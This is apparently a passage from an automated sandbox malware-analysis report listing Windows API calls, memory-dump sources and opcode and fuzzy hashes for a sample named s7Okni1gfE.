                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                            • String ID:
                                            • API String ID: 1157408455-0
                                            APIs
                                              • Part of subcall function 0083AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0083AA79
                                              • Part of subcall function 0083AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0083AA83
                                              • Part of subcall function 0083AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0083AA92
                                              • Part of subcall function 0083AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0083AA99
                                              • Part of subcall function 0083AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0083AAAF
                                            • GetLengthSid.ADVAPI32(?,00000000,0083ADE4,?,?), ref: 0083B21B
                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0083B227
                                            • HeapAlloc.KERNEL32(00000000), ref: 0083B22E
                                            • CopySid.ADVAPI32(?,00000000,?), ref: 0083B247
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                            • String ID:
                                            • API String ID: 4217664535-0
                                            APIs
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0083B498
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0083B4AA
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0083B4C0
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0083B4DB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0081B5A5
                                            • GetClientRect.USER32(?,?), ref: 0087E69A
                                            • GetCursorPos.USER32(?), ref: 0087E6A4
                                            • ScreenToClient.USER32(?,?), ref: 0087E6AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Client$CursorLongProcRectScreenWindow
                                            • String ID:
                                            • API String ID: 4127811313-0
                                            • Opcode ID: 8f42de0507a8cc9f3776a43da35366c82cfc1cc94e12b2f5863b7265a2d02bf0
                                            • Instruction ID: 0dcf6ef9808921afb252a056d87c6e057301579e4ac0c196384cd9538050f0a3
                                            • Opcode Fuzzy Hash: 8f42de0507a8cc9f3776a43da35366c82cfc1cc94e12b2f5863b7265a2d02bf0
                                            • Instruction Fuzzy Hash: 34113671900129BFCB10DF98D885DEE77BDFF19304F000455E901E7141E330AA91CBA1
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00847352
                                            • MessageBoxW.USER32(?,?,?,?), ref: 00847385
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0084739B
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008473A2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 2880819207-0
                                            • Opcode ID: d10f9fb5b5abd6514900c54a26e89dbccd35101fc47b00705b62a210d2b4e090
                                            • Instruction ID: d4c2aefa83b324080e1b01cb55d55d46464f78432ea2df0c0d93442254a6eb57
                                            • Opcode Fuzzy Hash: d10f9fb5b5abd6514900c54a26e89dbccd35101fc47b00705b62a210d2b4e090
                                            • Instruction Fuzzy Hash: 5711E172A04218BBCB019FAC9C09E9E7BA9FB48311F148215F921D33A1D7708D009BA1
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
                                            • GetStockObject.GDI32(00000011), ref: 0081D1CE
                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateMessageObjectSendStockWindow
                                            • String ID:
                                            • API String ID: 3970641297-0
                                            • Opcode ID: c70cfce160d4a69e090370d347153f8b3ff1d62ca1c589a9c45857b72618103c
                                            • Instruction ID: 3f4f833e2bf4cef9935c9143bd776a175b91b4063caec9ce349c1b783d284212
                                            • Opcode Fuzzy Hash: c70cfce160d4a69e090370d347153f8b3ff1d62ca1c589a9c45857b72618103c
                                            • Instruction Fuzzy Hash: F911ADB2101609BFEF125F949C54EEABB6DFF18368F044102FA0492050C731DCA0ABA0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                            • Instruction ID: ecd87df8d19fe6be4dda1f3269907f7631fa4a9ca9bb1e942881292974cea69f
                                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                            • Instruction Fuzzy Hash: E2014C7200014EBBCF126E88DC018EE3F23FB98365F589455FE1899131D336EAB1AB81
                                            APIs
                                              • Part of subcall function 00827A0D: __getptd_noexit.LIBCMT ref: 00827A0E
                                            • __lock.LIBCMT ref: 0082748F
                                            • InterlockedDecrement.KERNEL32(?), ref: 008274AC
                                            • _free.LIBCMT ref: 008274BF
                                            • InterlockedIncrement.KERNEL32(00F32AD0), ref: 008274D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                            • String ID:
                                            • API String ID: 2704283638-0
                                            • Opcode ID: 911e8b6b371546e6bfe8ad37a5a12aadff6cfa783a969555787dbb5ac94aded4
                                            • Instruction ID: ac866ac20e7abedca50fa8c714dccda93d7a0426992349717f05e2d46b16859f
                                            • Opcode Fuzzy Hash: 911e8b6b371546e6bfe8ad37a5a12aadff6cfa783a969555787dbb5ac94aded4
                                            • Instruction Fuzzy Hash: 94015E32905631ABD715BF6AB80975DBBA0FF08710F144109E815E7790D7246981CBDB
                                            APIs
                                            • __lock.LIBCMT ref: 00827AD8
                                              • Part of subcall function 00827CF4: __mtinitlocknum.LIBCMT ref: 00827D06
                                              • Part of subcall function 00827CF4: EnterCriticalSection.KERNEL32(00000000,?,00827ADD,0000000D), ref: 00827D1F
                                            • InterlockedIncrement.KERNEL32(?), ref: 00827AE5
                                            • __lock.LIBCMT ref: 00827AF9
                                            • ___addlocaleref.LIBCMT ref: 00827B17
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                            • String ID:
                                            • API String ID: 1687444384-0
                                            • Opcode ID: 4070f91720f37f173edd02880c69374f0fe5411b18702138a1c32e10b5a10f79
                                            • Instruction ID: 9432922b41bd483265ca4be2db4ba147c0bd243c28762c6a46352cff57cae979
                                            • Opcode Fuzzy Hash: 4070f91720f37f173edd02880c69374f0fe5411b18702138a1c32e10b5a10f79
                                            • Instruction Fuzzy Hash: D9015B75504B109FD7209F7AE90674AB7E0FF50321F20890EA49AD62A0DB74A684CB42
                                            APIs
                                            • _memset.LIBCMT ref: 0086E33D
                                            • _memset.LIBCMT ref: 0086E34C
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C3D00,008C3D44), ref: 0086E37B
                                            • CloseHandle.KERNEL32 ref: 0086E38D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memset$CloseCreateHandleProcess
                                            • String ID:
                                            • API String ID: 3277943733-0
                                            • Opcode ID: d5bd0339b2aa8cc6cb5cf1d7746d731db9d63d4bf1ae72bcb9c5053d8778a6d7
                                            • Instruction ID: a3ad89ea2873f089fc6a794a445e6a160ac49161808be10f431d9590f694f3c5
                                            • Opcode Fuzzy Hash: d5bd0339b2aa8cc6cb5cf1d7746d731db9d63d4bf1ae72bcb9c5053d8778a6d7
                                            • Instruction Fuzzy Hash: 5CF05EF1541314BAE2102BA4BC45FB77E7CFB04754F008421BF0AE62A2D3759E0187A9
                                            APIs
                                            • timeGetTime.WINMM ref: 0080EBFA
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0080ED9F
                                            • TranslateMessage.USER32(?), ref: 008759F7
                                            • DispatchMessageW.USER32(?), ref: 00875A05
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00875A19
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Message$DispatchTimeTranslatetime
                                            • String ID:
                                            • API String ID: 953213773-0
                                            • Opcode ID: c71cf2e18401ac7d67a721674c05c318134c351ff571bc9cbd1fb713564af524
                                            • Instruction ID: 9896fc50e043a3fd2fa6dd6e45c677fa78584c3bb9121c7cd61a246d43451a4f
                                            • Opcode Fuzzy Hash: c71cf2e18401ac7d67a721674c05c318134c351ff571bc9cbd1fb713564af524
                                            • Instruction Fuzzy Hash: 4EF08C3260938DEAE720C6E4EC09F9A779CFB54711F108C23A70EE6080EA71940587B2
                                            APIs
                                              • Part of subcall function 0081AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0081AFE3
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081AFF2
                                              • Part of subcall function 0081AF83: BeginPath.GDI32(?), ref: 0081B009
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081B033
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0086EA8E
                                            • LineTo.GDI32(00000000,?,?), ref: 0086EA9B
                                            • EndPath.GDI32(00000000), ref: 0086EAAB
                                            • StrokePath.GDI32(00000000), ref: 0086EAB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                            • String ID:
                                            • API String ID: 1539411459-0
                                            • Opcode ID: 5c5477dc8174c75bc4dff2cb43be60e7274cb3a97c5a5d6fab7f4ede2a396ba0
                                            • Instruction ID: 5fc673a90730edc917874ccf065a624b0697e13bdfa6390a4a4169e1fdbf5c43
                                            • Opcode Fuzzy Hash: 5c5477dc8174c75bc4dff2cb43be60e7274cb3a97c5a5d6fab7f4ede2a396ba0
                                            • Instruction Fuzzy Hash: 68F08231045669BBDF12AF98AC0DFCE3F2ABF16311F044201FA11A50E2C7745552DB95
                                            APIs
                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0083C84A
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083C85D
                                            • GetCurrentThreadId.KERNEL32 ref: 0083C864
                                            • AttachThreadInput.USER32(00000000), ref: 0083C86B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                            • String ID:
                                            • API String ID: 2710830443-0
                                            • Opcode ID: 8e9eb0302cbbcc9e18793a0bf72872b90debffee446a489f7c462a7266da6f5a
                                            • Instruction ID: bd6789e12d36f19bf5d6968b157eae838aaf00a226eb052835e147046f19982c
                                            • Opcode Fuzzy Hash: 8e9eb0302cbbcc9e18793a0bf72872b90debffee446a489f7c462a7266da6f5a
                                            • Instruction Fuzzy Hash: 27E03971141328BADB206BA69C0DEDB7F1CFF567A1F008021B609D44A1D7B18681CBE0
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 0083B0D6
                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0083AC9D), ref: 0083B0DD
                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0083AC9D), ref: 0083B0EA
                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0083AC9D), ref: 0083B0F1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentOpenProcessThreadToken
                                            • String ID:
                                            • API String ID: 3974789173-0
                                            • Opcode ID: 5eb83e73114d80d6ee9d3b393319eefd353a6d325ae72e0281cb43f53cefe50a
                                            • Instruction ID: 53f078f442c815f775c057a4df164d2a966976c6f01f92082b209979cf74ca76
                                            • Opcode Fuzzy Hash: 5eb83e73114d80d6ee9d3b393319eefd353a6d325ae72e0281cb43f53cefe50a
                                            • Instruction Fuzzy Hash: 21E086726413129BD7202FB65C0CF473BA9FF95795F118828F341D60C0EB348401C761
                                            APIs
                                            • GetSysColor.USER32(00000008), ref: 0081B496
                                            • SetTextColor.GDI32(?,000000FF), ref: 0081B4A0
                                            • SetBkMode.GDI32(?,00000001), ref: 0081B4B5
                                            • GetStockObject.GDI32(00000005), ref: 0081B4BD
                                            • GetWindowDC.USER32(?,00000000), ref: 0087DE2B
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0087DE38
                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0087DE51
                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0087DE6A
                                            • GetPixel.GDI32(00000000,?,?), ref: 0087DE8A
                                            • ReleaseDC.USER32(?,00000000), ref: 0087DE95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                            • String ID:
                                            • API String ID: 1946975507-0
                                            • Opcode ID: 07db5047beb1261ebc45b5c3d512f6d3cf5134452198adafe45a718a91f7f8b4
                                            • Instruction ID: c26ea752dd3accd54284a5b180b9f0998ab38068f25b84a9ac10f8305a0d701c
                                            • Opcode Fuzzy Hash: 07db5047beb1261ebc45b5c3d512f6d3cf5134452198adafe45a718a91f7f8b4
                                            • Instruction Fuzzy Hash: D1E0C935100340AADB216B68AC0DBD87B22FF51335F14C666F669980E6C77189819B11
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: d593e1e7a81f6170774c774c54de904bbb435228635b1363e6a968a661a8d613
                                            • Instruction ID: efedc9b39a02a14ccacf2ec7626f0b6afdb11cad878c9f569b7c83d8e02bbfd5
                                            • Opcode Fuzzy Hash: d593e1e7a81f6170774c774c54de904bbb435228635b1363e6a968a661a8d613
                                            • Instruction Fuzzy Hash: D1E01AB1100308EFDB00AF748848A6D7BA9FF5C354F11C805F95AC7291DA7498408B80
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0083B2DF
                                            • UnloadUserProfile.USERENV(?,?), ref: 0083B2EB
                                            • CloseHandle.KERNEL32(?), ref: 0083B2F4
                                            • CloseHandle.KERNEL32(?), ref: 0083B2FC
                                              • Part of subcall function 0083AB24: GetProcessHeap.KERNEL32(00000000,?,0083A848), ref: 0083AB2B
                                              • Part of subcall function 0083AB24: HeapFree.KERNEL32(00000000), ref: 0083AB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                            • String ID:
                                            • API String ID: 146765662-0
                                            • Opcode ID: e4f96b8c0edc705b0e242efd287fa0d62f322b8c728fe6b0218dfb9f7193f736
                                            • Instruction ID: 024f51b1709c5675a4e4bdff3c7bb0d1f7094dfe24e50eab293d09e5fb8ac9e3
                                            • Opcode Fuzzy Hash: e4f96b8c0edc705b0e242efd287fa0d62f322b8c728fe6b0218dfb9f7193f736
                                            • Instruction Fuzzy Hash: A2E0EC3A104106BFDB013FA9EC08859FFB6FF983213108221F625816B1DB32A871EB91
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: faecfa95bfbf32b8f88f49e630eb377cd8ff72c0a4313fc64af03eb14ab1b05f
                                            • Instruction ID: be894376a6b8bbf84d513615d669b53a5dc7e08f7aad1b94b74245b1dde98616
                                            • Opcode Fuzzy Hash: faecfa95bfbf32b8f88f49e630eb377cd8ff72c0a4313fc64af03eb14ab1b05f
                                            • Instruction Fuzzy Hash: CFE046B1500308EFDB00AF78C848A6D7BA9FF5C390F118809F95ECB291EB7898408B80
                                            APIs
                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0083DEAA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                             • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmp
